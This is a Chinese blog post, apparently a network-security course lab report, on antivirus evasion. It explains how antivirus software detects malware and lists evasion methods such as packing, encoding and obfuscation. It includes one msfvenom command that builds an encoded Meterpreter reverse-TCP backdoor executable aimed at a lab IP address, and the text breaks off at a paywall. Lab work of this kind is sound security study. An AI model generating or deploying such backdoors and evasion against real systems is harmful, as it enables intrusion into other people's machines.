EXP3 免杀原理与实践

VIP文章 已于 2022-04-16 10:45:25 修改
阅读量532 收藏 1
点赞数 1
文章标签: 其他
于 2022-04-06 18:08:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ISrookie/article/details/123964994
版权

20191217 EXP3 免杀原理实践

基础问题回答

  1. 杀软是如何检测出恶意代码的?
    基于行为的恶意软件检测:对运行的所有进程进行实时监控,如果有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉,一般也是针对特征扫描的而言的,指通用的、多特征的、非精确的扫描,相当于加入了行为监控的启发式。
    利用启发式恶意软件检测:将一个软件与恶意软件的行为、代码等作比对,如果发现相似度达到一定程度,即判定这个程序为恶意代码,有一定误报可能,简单来说,就是根据些片面特征去推断。通常是因为缺乏精确判定依据。
    基于特征码进行检测:杀毒软件的病毒库记录了一些恶意软件的特征码,一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。这些特征码一般由一个不大于64字节的字符串组成,且是只有该病毒内才出现的字符串,根据已检测出或网络上公布的病毒,对其提取特征码,记录在病毒库中,检测到程序时将程序与特征码比对即可判断是否是恶意代码。

  2. 免杀是做什么?

    免杀就是让安插的后门不被AV软件发现,防止注入的后门在目标机器上被杀毒软件或者其他的防护软件识别并删除.

  1. 免杀的基本方法有哪些?

    改变特征码
    加壳:压缩壳 加密壳
    有shellcode(像Meterpreter)
    用encode进行编码
    基于payload重新编译生成可执行文件
    进行代码混淆
    编译恶意程序时需要开启堆栈保护,降低文件大小

  1. 开启杀软能绝对防止电脑中恶意代码吗?

    不能绝对防止。不同的杀软对不同的后门查杀力度不同,有可能你所中的恶意代码刚好无法被你电脑的杀软识别。

实践内容

正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

1.1.检测直接生成的后门exe文件(实验二中的后门程序)
检出率为53/68
在这里插入图片描述

1.2.使用Unicode编码一次
在Kali中使用 msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -b ‘\x00’ LHOST=192.168.154.129 LPORT=1217 -f exe > backdoor1.exe

最低0.47元/天 解锁文章
ISrookie
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python3中exp()函数用法分析
09-19
在本篇文章里小编给大家整理了关于Python3中exp()函数用法以及相关知识点,需要的朋友们学习下。
EXP3算法
weixin_39550091的博客
10-10 5669
参考 本文章 Exp3算法 Exp3算法是解决多臂老虎机(MAB)问题的常用算法,其核心思想是,维护某一个臂概率,接着每次随机选择某个臂,根据选择后观察到的收益情况更新臂的权重,如此迭代下去,该算法可以保证后悔值在一定可接受范围内。 伪代码如下: 定义: γ∈(0,1];γ\in(0,1];γ∈(0,1]; t为轮数;t为轮数;t为轮数; i=1,2....K;i=1,2....K;i=1,2...
【Bandit Algorithms学习笔记】EXP3算法理论证明
TommyGong08的博客
02-02 4132
本文介绍了对抗式赌博机adversarial bandit问题以及解决此问题常见的exp3算法,并对exp3算法的遗憾上界做出了证明。
Exp3-免杀原理实践-20202127
qq_57435798的博客
03-29 503
本此实验遇到的比较大的问题就是veil的安装,当时反复出现wine32缺失的报错,按照系统给的命令操作之后,却又一直卡在某一行,我也不知道是这一步就应该等待这么久还是我的操作出现了问题,反复多次尝试之后,我在操作到那一步之后,出去吃了顿晚饭,回来之后就惊喜地发现veil已经安装完毕,由此,我也确定了我的操作并没有问题,只是确实需要等待很久。同时,由于恶意代码也会随着科技进步发展变化,只能说是最大程度地去防止恶意代码,而且不同的杀软有不同的性能,对于恶意代码的防范也有一定的局限性,所以绝对是很难做到的!
免杀原理实践
cyuyan3hao的博客
04-08 967
网络对抗技术实验三
免杀技术
weixin_30823227的博客
05-27 276
一、基础知识 1.杀软是如何检测出恶意代码的? (1)检测特征码 人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻合来判断某段代码是否属于病毒。 (2)启发式恶意软件检测 如果该程序的特征和行为与病毒程序类似,其匹配程度达到一定值就可以认为该程序是病毒程序。 (3)基于行为检测 与启发式检测类似,只是单纯依靠监测程序行为来作为标准。通过监视恶意代...
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
id3lib.exp_release_Creating_id3lib_exp_
10-02
C++ library for creating and manipulating id3v1/2 tags.Copyright 2002 2003 Thijmen Klok
id3lib.exp_id3lib_Thomas!_exp_binaries_
10-03
This library is free software.C++ library for creating and manipulating id3v1/2 tags.Copyright 1999 2000 Scott Thomas HaugCopyright 2002 2003 Thijmen Klok
提权EXP 多次成功
12-09
直接运行就好了。密码自己查看源码直接运行就好了。密码自己查看源码 直接运行就好了。密码自己查看源码
SE加壳工具包
07-06
SE加壳工具包
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 648
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
多臂赌博机,multi-armed bandit problem(3):
mmc2015的专栏
04-26 6719
感觉多臂赌博机方面的中文文献很少,偶尔碰到,记录一下,方便其它人学习。感谢原作者:http://mlyixi.byethost32.com/blog/?cat=35 在上两节我们讨论的UCB系列算法面对的情况是静态的,即各臂的分布参数不会改变,于是我们就"乐观地面对不确定性"--根据采样平均值尽快地确定那个最好的臂. 但是在现实世界中收益结构是更复杂的,非静态的
Exp3
bameng0081的博客
04-11 268
利用不同免杀方式生成文件 1.msfvenom 使用msfvenom命令查看功能介绍 其中有: -p 选择一个载荷(或者叫模块) -l 载荷列表 -f 生成的文件格式 -e 编码方式 -l 编码次数 -b 在生成的程序中避免出现的值 -h 帮助 msfvenom入手教学 示例:使用msfvenom生成文件 目标平台为win7 32位,查询能在该平台上运行的载荷: 执行相应指令...
算法exp3_Prim&&Kruskal最小生成树
Xixoqw的博客
05-28 363
算法实验3 代码链接
恶意代码检测技术
热门推荐
编程小栈
02-14 1万+
今天开始,认真准备毕设。 随着恶意代码成为信息安全的重要威胁,恶意代码检测技术成为信息安全领域的重要研究方向。目前已经有基于签名、启发式、行为式等几种检测恶意代码的方法,应用最广泛也是最成熟的当属基于签名的检测技术,当前研究的热点是能够检测未知恶意代码的基于数据挖掘和机器学习检测技术。下面分别对几种检测方法进行介绍。 1.1.  基于签名的检测技术 基于签名的检测技术主要基于模式匹配的思
20145312《网络攻防》 免杀原理实践
acn19249的博客
03-21 128
20145312 《网络攻防》 免杀原理实践 基础问题回答 1.杀软是如何检测出恶意代码的? 基于特征码的检测:杀软通过对已存在的流行代码特征的提取与比对检测到具有该特征码的程序就当作检测到了恶意代码。 基于行为的检测:杀软通过检测程序是否有更改注册表行为、是否有设置自启动、是否有修改权限等等 2.免杀是做什么? 通过一些手段来瞒过杀软的检测扫描,避免被杀毒软件查杀,并能成功控制...
exp8266物联网开发板原理
最新发布
05-26
ESP8266物联网开发板的原理是通过ESP8266模块实现与WiFi网络的连接,并通过串口与外部设备(如传感器、执行器等)进行通信,从而实现物联网设备的控制和数据传输。用户可以通过编程语言(如C语言、Python等)编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值